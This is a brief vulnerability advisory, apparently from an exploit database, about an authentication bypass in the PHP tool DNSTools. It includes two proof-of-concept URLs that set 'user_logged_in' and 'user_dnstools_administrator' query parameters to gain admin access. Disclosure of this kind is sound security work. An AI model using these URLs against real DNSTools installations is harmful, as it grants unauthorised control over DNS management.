8 lines
No EOL
600 B
Text
8 lines
No EOL
600 B
Text
source: http://www.securityfocus.com/bid/4617/info
|
|
|
|
DNSTools is a web based managment tool for DNS information. It is implemented in PHP, and available for Linux and Solaris.
|
|
|
|
A vulnerability has been reported in some versions of DNSTools which allows any remote attacker to gain administrative access. An artificially constructed URL may define variables used to track user authentication and administrative access.
|
|
|
|
http://www.example.com/dnstools.php?section=hosts&user_logged_in=true
|
|
http://www.example.com/dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES |